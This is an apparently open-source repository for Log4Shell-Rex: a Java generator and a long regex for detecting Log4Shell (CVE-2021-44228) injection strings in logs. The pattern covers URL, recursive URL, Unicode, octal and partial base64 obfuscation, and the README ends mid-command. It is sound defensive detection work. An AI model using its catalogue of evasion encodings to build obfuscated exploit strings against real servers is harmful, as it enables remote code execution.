├── .gitignore ├── Alphabet ├── Alphabet.java ├── README.md ├── README.sh ├── RegEx_Generator.sh ├── screenshots ├── example_1.png ├── example_2.png ├── example_3.png ├── example_4a.png ├── example_4b.png ├── example_4c.jpeg ├── viz_4.png └── viz_4.svg └── testdata └── cve-2021-44228.csv /.gitignore: -------------------------------------------------------------------------------- 1 | *.class 2 | -------------------------------------------------------------------------------- /Alphabet: -------------------------------------------------------------------------------- 1 | # This alphabet is generated automatically 2 | # Changes need to be made in Alphabet.java 3 | dollar='(?:[\x24]|%(?:25%?)*24|\\u?0*(?:44|24))' 4 | curly_open='(?:[\x7b]|%(?:25%?)*7b|\\u?0*(?:7b|173))' 5 | colon='(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))' 6 | slash='(?:[\x2f]|%(?:25%?)*2f|\\u?0*(?:57|2f))' 7 | a='(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))' 8 | b='(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))' 9 | c='(?:c|%(?:25%?)*(?:43|63)|\\u?0*(?:143|103|63|43))' 10 | d='(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))' 11 | e='(?:e|%(?:25%?)*(?:45|65)|\\u?0*(?:45|145|105|65))' 12 | f='(?:f|%(?:25%?)*(?:46|66)|\\u?0*(?:66|46|146|106))' 13 | g='(?:g|%(?:25%?)*(?:47|67)|\\u?0*(?:67|47|147|107))' 14 | h='(?:h|%(?:25%?)*(?:48|68)|\\u?0*(?:110|68|48|150))' 15 | i='(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))' 16 | j='(?:j|%(?:25%?)*(?:4a|6a)|\\u?0*(?:112|6a|4a|152))' 17 | k='(?:[k\x{212a}]|%(?:25%?)*(?:4b|6b|E2%(?:25%?)*84%(?:25%?)*AA)|\\u?0*(?:113|20452|212a|6b|4b|153))' 18 | l='(?:l|%(?:25%?)*(?:4c|6c)|\\u?0*(?:154|114|6c|4c))' 19 | m='(?:m|%(?:25%?)*(?:4d|6d)|\\u?0*(?:4d|155|115|6d))' 20 | n='(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))' 21 | o='(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))' 22 | p='(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))' 23 | q='(?:q|%(?:25%?)*(?:51|71)|\\u?0*(?:121|71|51|161))' 24 | 
r='(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))' 25 | s='(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))' 26 | t='(?:t|%(?:25%?)*(?:54|74)|\\u?0*(?:124|74|54|164))' 27 | u='(?:u|%(?:25%?)*(?:55|75)|\\u?0*(?:55|165|125|75))' 28 | v='(?:v|%(?:25%?)*(?:56|76)|\\u?0*(?:56|166|126|76))' 29 | w='(?:w|%(?:25%?)*(?:57|77)|\\u?0*(?:77|57|167|127))' 30 | x='(?:x|%(?:25%?)*(?:58|78)|\\u?0*(?:78|58|170|130))' 31 | y='(?:y|%(?:25%?)*(?:59|79)|\\u?0*(?:79|59|171|131))' 32 | z='(?:z|%(?:25%?)*(?:5a|7a)|\\u?0*(?:132|7a|5a|172))' 33 | -------------------------------------------------------------------------------- /Alphabet.java: -------------------------------------------------------------------------------- 1 | import java.util.ArrayList; 2 | import java.util.HashSet; 3 | import java.net.URLEncoder; 4 | 5 | /** Generator for the {@code Alphabet} file: for each tracked character it prints one line of the form {@code name='(?:<plain>|<url-encoded>|<unicode-or-octal-escape>)'}, a sub-pattern that matches that character in every encoding the detection regex is meant to accept. Run via {@code main}; output goes to stdout. */ public class Alphabet { 6 | 7 | /* Letters in output order: the four special characters first, then a-z. Raw ArrayList; the enhanced-for loops below cast each element to Letter. */ private ArrayList letters = null; 8 | 9 | /** Prints a two-line header comment followed by the alphabet. If a Letter rejects its character (cannot happen with the fixed literals used by the constructor) an error is written to stderr and the process exits with status 1. */ public static void main(String[] args) { 10 | 11 | try { 12 | Alphabet alphabet = new Alphabet(); 13 | 14 | System.out.println("# This alphabet is generated automatically"); 15 | System.out.println("# Changes need to be made in Alphabet.java"); 16 | System.out.println(alphabet); 17 | } catch (Letter.NonLowerCaseLetterException e) { 18 | // Using System.*.println for logging, out of a reason... 
;-) 19 | System.err.println("[ERROR] Make sure the alphabet class only contains a lower case alphabet."); 20 | System.exit(1); 21 | } 22 | 23 | } 24 | 25 | /** Builds the alphabet: named entries for '$', '{', ':' and '/' followed by each of a-z, named by the letter itself. @throws Letter.NonLowerCaseLetterException if a character is not already lower case (not reachable with the literals below). */ public Alphabet() throws Letter.NonLowerCaseLetterException { 26 | this.letters = new ArrayList<>(); 27 | 28 | // Adding special characters to the alphabet; the names become the variable names in the generated file 29 | this.letters.add(new Letter("dollar", '$')); 30 | this.letters.add(new Letter("curly_open", '{')); 31 | this.letters.add(new Letter("colon", ':')); 32 | this.letters.add(new Letter("slash", '/')); 33 | 34 | // Adding all literals to the alphabet 35 | char[] literals = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 36 | 's', 't', 'u', 'v', 'w', 'x', 'y', 'z' }; 37 | for (int i = 0; i < literals.length; ++i) { 38 | Letter letter = new Letter(literals[i], literals[i]); 39 | this.letters.add(letter); 40 | } 41 | } 42 | 43 | /** Joins every Letter's rendered line with {@link System#lineSeparator()}; returns "" when there are no letters. */ public String toString() { 44 | StringBuilder sb = null; 45 | 46 | for (Letter letter : this.letters) { 47 | if (sb != null) { 48 | sb.append(System.lineSeparator()); 49 | } else { 50 | sb = new StringBuilder(); 51 | } 52 | 53 | sb.append(letter.toString()); 54 | 55 | } 56 | 57 | if (sb != null) { 58 | return sb.toString(); 59 | } else { 60 | return ""; 61 | } 62 | } 63 | 64 | /** One alphabet entry: a name, the lower-case character it stands for, and every BMP code point that case-folds to it (this is how 'i' also collects U+0130/U+0131 and 'k' collects U+212A in the generated file). NOTE(review): reads no Alphabet state, so it could be a static nested class. */ private class Letter { 65 | 66 | /* Identifier used on the left-hand side of the emitted line. */ private String myName; 67 | /* The lower-case character this entry represents. */ private char myChar; 68 | /* Code points collected by initCodePoints(); raw ArrayList holding Integer values. */ private ArrayList codePoints = null; 69 | 70 | /** Convenience overload for single-character names (the a-z entries). */ public Letter(char name, char c) throws NonLowerCaseLetterException { 71 | this(String.valueOf(name), c); 72 | } 73 | 74 | /** @throws NonLowerCaseLetterException if {@code c} differs from its own lower-case form; characters without case ('$', '{', ':', '/') pass the check unchanged. */ public Letter(String name, char c) throws NonLowerCaseLetterException { 75 | if (c == Character.toLowerCase(c)) { 76 | myName = name; 77 | myChar = c; 78 | 79 | initCodePoints(); 80 | } else { 81 | throw new NonLowerCaseLetterException(); 82 | } 83 | } 84 | 85 | /** Renders {@code name='(?:plain|url-encoded|unicode-octal)'}; the three alternatives come from the helpers below, in that order. */ public String toString() { 86 | StringBuilder sb = new StringBuilder(); 87 | 88 | sb.append(this.myName + "='(?:"); 89 | sb.append(regExPlainLetter()); 90 | sb.append("|"); 91 | sb.append(regExUrlEncoded()); 92 
| sb.append("|"); 93 | sb.append(regExUnicodeOctal()); 94 | sb.append(")'"); 95 | 96 | return sb.toString(); 97 | } 98 | 99 | /** Plain-text alternative: a single escape, or a character class when more than one code point contributes. [a-z0-9] are emitted literally, [A-Z] are skipped (see the comment in the loop), two-digit code points become \xHH and longer ones \x{H..}. Returns "" when there are no code points. NOTE(review): case-insensitivity of this alternative therefore depends on the consuming pattern setting (?i); the generated file does not embed the flag itself. */ private String regExPlainLetter() { 100 | StringBuilder sb = null; 101 | for (Integer codePoint : this.codePoints) { 102 | if (sb == null) { 103 | sb = new StringBuilder(); 104 | } 105 | 106 | String hex = Integer.toHexString(codePoint); 107 | String str = String.valueOf((char) (int) codePoint); 108 | if (str.matches("[a-z0-9]")) { 109 | sb.append(str); 110 | } else if (str.matches("[A-Z]")) { 111 | // Upper-case variants are dropped: only the lower-case form is emitted and the consuming RegEx is expected to set (?i) (the README pattern starts with (?im)) 112 | } else if (hex.length() == 2) { 113 | sb.append("\\x" + hex); 114 | } else { 115 | sb.append("\\x{" + hex + "}"); 116 | } 117 | } 118 | 119 | if (sb != null) { 120 | String str = sb.toString(); 121 | if (str.length() > 1) { 122 | return "[" + str + "]"; 123 | } else { 124 | return str; 125 | } 126 | } else { 127 | return ""; 128 | } 129 | } 130 | 131 | /** URL-encoded alternative. Every code point contributes one branch; the shared prefix {@code %(?:25%?)*} (a '%' that may itself be percent-encoded any number of times, i.e. recursive URL encoding) is prepended once, and the branches are wrapped in (?:...) only when there is more than one. Returns "" when there are no code points. */ private String regExUrlEncoded() { 132 | StringBuilder sb = null; 133 | 134 | for (Integer codePoint : this.codePoints) { 135 | if (sb != null) { 136 | sb.append("|"); 137 | } else { 138 | sb = new StringBuilder(); 139 | } 140 | 141 | String encoded; 142 | 143 | if (codePoint <= 255) { 144 | // Code points <= 0xff are emitted as bare hex digits, lower case and unpadded (the leading '%' is added by the caller below). NOTE(review): for 0x80..0xff this would be the Latin-1 byte rather than a UTF-8 sequence; the generated file shows no code point in that range, so this branch appears to only ever see ASCII -- confirm 145 | encoded = Integer.toHexString(codePoint); 146 | } else { 147 | // Above 0xff: percent-encode the UTF-8 bytes (upper-case hex, e.g. C4%B0), drop the leading '%' because the caller re-adds it, and let every remaining '%' absorb recursive %25 encoding 148 | char ch = (char) (int) codePoint; 149 | String st = String.valueOf(ch); 150 | try { 151 | encoded = URLEncoder.encode(st, "UTF-8").substring(1); 152 | encoded = encoded.replace("%", "%(?:25%?)*"); 153 | } catch (java.io.UnsupportedEncodingException e) { 154 | throw new AssertionError("UTF-8 is unknown"); 155 | } 156 | } 157 | 158 | sb.append(encoded); 159 | } 160 | 161 | if (sb != null) { 162 | String str = sb.toString(); 163 | if (str.split("\\|", 2).length == 1) { 164 | return "%(?:25%?)*" + str; 165 | } else { 166 | return "%(?:25%?)*(?:" + str + ")"; 167 | } 168 | } else { 169 | return ""; 170 | } 171 
| } 172 | 173 | /** Escape-sequence alternative, rendered as {@code \\u?0*(?:...)}: a literal backslash, an optional 'u', any number of leading zeros, then the code point either as hex or as octal digits. Hex and octal strings share one set, so a hex escape of one character can also satisfy the octal branch of another (e.g. 'd' lists 44 as hex of 'D', and '$' lists 44 as its octal value); the pattern over-matches rather than misses. NOTE(review): HashSet iteration order fixes the branch order, so regenerating on another JVM may reorder branches without changing what is matched. */ private String regExUnicodeOctal() { 174 | HashSet list = new HashSet<>(); 175 | 176 | for (int codePoint : this.codePoints) { 177 | list.add(Integer.toHexString(codePoint)); 178 | list.add(Integer.toOctalString(codePoint)); 179 | } 180 | 181 | StringBuilder sb = new StringBuilder(); 182 | sb.append("\\\\u?0*(?:"); 183 | sb.append(String.join("|", list)); 184 | sb.append(")"); 185 | 186 | return sb.toString(); 187 | } 188 | 189 | /** Collects every BMP code point whose lower-case form, or whose upper-case form's lower-case form, equals myChar. This is what pulls in the Unicode look-alikes (U+0130/U+0131 for 'i', U+212A for 'k', U+017F for 's') that an attacker could substitute and that a plain ASCII pattern would miss. */ private void initCodePoints() { 190 | this.codePoints = new ArrayList<>(); 191 | 192 | // Iterate over all Unicode code points from 0000 ... ffff (the BMP); within this range toChars()[0] is the code point itself 193 | for (int codePoint = 0; codePoint <= 65535; ++codePoint) { 194 | char literal = Character.toChars(codePoint)[0]; 195 | char literalUpper = Character.toUpperCase(literal); 196 | 197 | if (Character.toLowerCase(literal) == this.myChar 198 | || Character.toLowerCase(literalUpper) == this.myChar) { 199 | this.codePoints.add(codePoint); 200 | } 201 | } 202 | } 203 | 204 | /** Thrown by Letter when the supplied character is not its own lower-case form. */ public static class NonLowerCaseLetterException extends Exception { 205 | 206 | } 207 | } 208 | 209 | } 210 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Log4Shell-Rex 2 | 3 | The following RegEx was written in an attempt to match indicators of a Log4Shell (CVE-2021-44228 and 4 | CVE-2021-45046) exploitation. 5 | 6 | **If you run a version from pre 2021/12/21, it's highly recommended to test and update.**\ 7 | I've removed some quirks and enhanced performance. 8 | 9 | The Regex aims being PCRE compatible, but should also run on re2 and potentially more RegEx engines. 
10 | 11 | **RegEx:** 12 | ```regex 13 | (?im)(?:^|[\n]).*?(?:[\x24]|%(?:25%?)*24|\\u?0*(?:44|24))(?:[\x7b]|%(?:25%?)*7b|\\u?0*(?:7b|173))[^\n]*?((?:j|%(?:25%?)*(?:4a|6a)|\\u?0*(?:112|6a|4a|152))[^\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))[^\n]*?((?:l|%(?:25%?)*(?:4c|6c)|\\u?0*(?:154|114|6c|4c))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))(?:[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163)))?|(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))[^\n]*?(?:m|%(?:25%?)*(?:4d|6d)|\\u?0*(?:4d|155|115|6d))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))|(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))){2}[^\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))|(?:c|%(?:25%?)*(?:43|63)|\\u?0*(?:143|103|63|43))[^\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))[^\n]*?(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))[^\n]*?(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))|(?:n|%(?:25%?)*(?:4e|6e)|
\\u?0*(?:4e|156|116|6e))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:h|%(?:25%?)*(?:48|68)|\\u?0*(?:110|68|48|150))(?:[^\n]*?(?:t|%(?:25%?)*(?:54|74)|\\u?0*(?:124|74|54|164))){2}[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))(?:[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163)))?)[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))|(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))[^\n]*?(?:e|%(?:25%?)*(?:45|65)|\\u?0*(?:45|145|105|65))[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))(JH[s-v]|[\x2b\x2f-9A-Za-z][CSiy]R7|[\x2b\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\x2b\x2f-9w-z])) 14 | ``` 15 | 16 | ## Capabilities 17 | 18 | By now, this regex should match the exploit, regardless: 19 | 20 | - Just logged 21 | - Case insensitive (also in all supported encodings) 22 | - URL Encoded 23 | - Recursively URL Encoded 24 | - With Unicode encoding 25 | - With Octal encoding 26 | - Base64 encoded (rudimentary) 27 | 28 | ### Background 29 | 30 | The goal is to have a RegEx that represents a reasonable tradeoff between detecting as many attack 31 | attempts as possible with an acceptable number of false positives. 32 | 33 | The APT attacker will find a way around if necessary, but less elaborate attacks will leave the 34 | warning light on. 35 | 36 | Why a (single) RegEx: Because it can be easily executed on the CLI or in a SIEM without any 37 | additional tools. If tools can be executed, do it, they exist. 38 | 39 | The length of the regex is less of a problem than its performance. Despite the length, the RegEx 40 | should be acceptably fast to execute on average log data. 41 | 42 | ### Call for action 43 | 44 | I wanna make it hard to hide an attack in real world szenarios. 
45 | 46 | If this RegEx does not match sth. you have seen in the wild or can show being exploitable, please 47 | create an issue. 48 | 49 | It is known, that you can work around the RegEx easily by encoding different parts of the attack 50 | pattern using Base64. How ever, this is accepted, as `base64` did not finaly made it into an 51 | official Log4j release yet. ([LOG4J2-2446](https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-2446)) 52 | 53 | ### Tools 54 | 55 | - Test the RegEx: **[regex101](https://regex101.com/r/KqGG3W/24)** 56 | - Visualize the Regex: **[REGEXPER](https://regexper.com/#%28%3F%3A%5E%7C%5B%5Cn%5D%29.*%3F%28%3F%3A%5B%5Cx24%5D%7C%25%28%3F%3A25%25%3F%29*24%7C%5C%5Cu%3F0*%28%3F%3A44%7C24%29%29%28%3F%3A%5B%5Cx7b%5D%7C%25%28%3F%3A25%25%3F%29*7b%7C%5C%5Cu%3F0*%28%3F%3A7b%7C173%29%29%5B%5E%5Cn%5D*%3F%28%28%3F%3Aj%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4a%7C6a%29%7C%5C%5Cu%3F0*%28%3F%3A112%7C6a%7C4a%7C152%29%29%5B%5E%5Cn%5D*%3F%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5B%5Cx3a%5D%7C%25%28%3F%3A25%25%3F%29*3a%7C%5C%5Cu%3F0*%28%3F%3A72%7C3a%29%29%5B%5E%5Cn%5D*%3F%28%28%3F%3Al%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4c%7C6c%29%7C%5C%5Cu%3F0*%28%3F%3A154%7C114%7C6c%7C4c%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Aa%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A41%7C61%29%7C%5C%5Cu%3F0*%28%3F%3A101%7C61%7C41%7C141%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ap%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A50%7C70%29%7C%5C%5Cu%3F0*%28%3F%3A70
%7C50%7C160%7C120%29%29%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%29%3F%7C%28%3F%3Ar%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A52%7C72%29%7C%5C%5Cu%3F0*%28%3F%3A122%7C72%7C52%7C162%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Am%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4d%7C6d%29%7C%5C%5Cu%3F0*%28%3F%3A4d%7C155%7C115%7C6d%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%7C%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%7C%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%7C%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%29%7B2%7D%5B%5E%5Cn%5D*%3F%28%3F%3Ao%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4f%7C6f%29%7C%5C%5Cu%3F0*%28%3F%3A6f%
7C4f%7C157%7C117%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ap%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A50%7C70%29%7C%5C%5Cu%3F0*%28%3F%3A70%7C50%7C160%7C120%29%29%7C%28%3F%3Ac%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A43%7C63%29%7C%5C%5Cu%3F0*%28%3F%3A143%7C103%7C63%7C43%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ao%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4f%7C6f%29%7C%5C%5Cu%3F0*%28%3F%3A6f%7C4f%7C157%7C117%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ar%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A52%7C72%29%7C%5C%5Cu%3F0*%28%3F%3A122%7C72%7C52%7C162%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ab%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A42%7C62%29%7C%5C%5Cu%3F0*%28%3F%3A102%7C62%7C42%7C142%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Aa%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A41%7C61%29%7C%5C%5Cu%3F0*%28%3F%3A101%7C61%7C41%7C141%29%29%7C%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%7C%28%3F%3Ah%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A48%7C68%29%7C%5C%5Cu%3F0*%28%3F%3A110%7C68%7C48%7C150%29%29%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3At%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A54%7C74%29%7C%5C%5Cu%3F0*%28%3F%3A124%7C74%7C54%7C164%29%29%29%7B2%7D%5B%5E%5Cn%5D*%3F%28%3F%3Ap%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A50%7C70%29%7C%5C%5Cu%3F0*%28%3F%3A70%7C50%7C160%7C120%29%29%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%29%3F%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5B%5Cx3a%5D%7C%25%28%3F%3A25%25%3F%29*3a%7C%5C%5Cu%3F0*%28%3F%3A72%7C3a%29%29%7C%28%3F%3Ab%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A42%7C62%29%7C%5C%5Cu%3F0*%28%3F%3A102%7C62%7C42%7C142%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Aa%7C%25%28%3F%3A25%25%3F%29*%28%3F%
3A41%7C61%29%7C%5C%5Cu%3F0*%28%3F%3A101%7C61%7C41%7C141%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ae%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A45%7C65%29%7C%5C%5Cu%3F0*%28%3F%3A45%7C145%7C105%7C65%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5B%5Cx3a%5D%7C%25%28%3F%3A25%25%3F%29*3a%7C%5C%5Cu%3F0*%28%3F%3A72%7C3a%29%29%28JH%5Bs-v%5D%7C%5B%5Cx2b%5Cx2f-9A-Za-z%5D%5BCSiy%5DR7%7C%5B%5Cx2b%5Cx2f-9A-Za-z%5D%7B2%7D%5B048AEIMQUYcgkosw%5Dke%5B%5Cx2b%5Cx2f-9w-z%5D%29%29)** 57 | 58 | ## Hunting on your Linux machine 59 | 60 | ### On the CLI with `grep` 61 | 62 | ```bash 63 | eval "$(./RegEx_Generator.sh)" 64 | grep -P ${Log4ShellRex} 65 | ``` 66 | 67 | ```bash 68 | grep -P 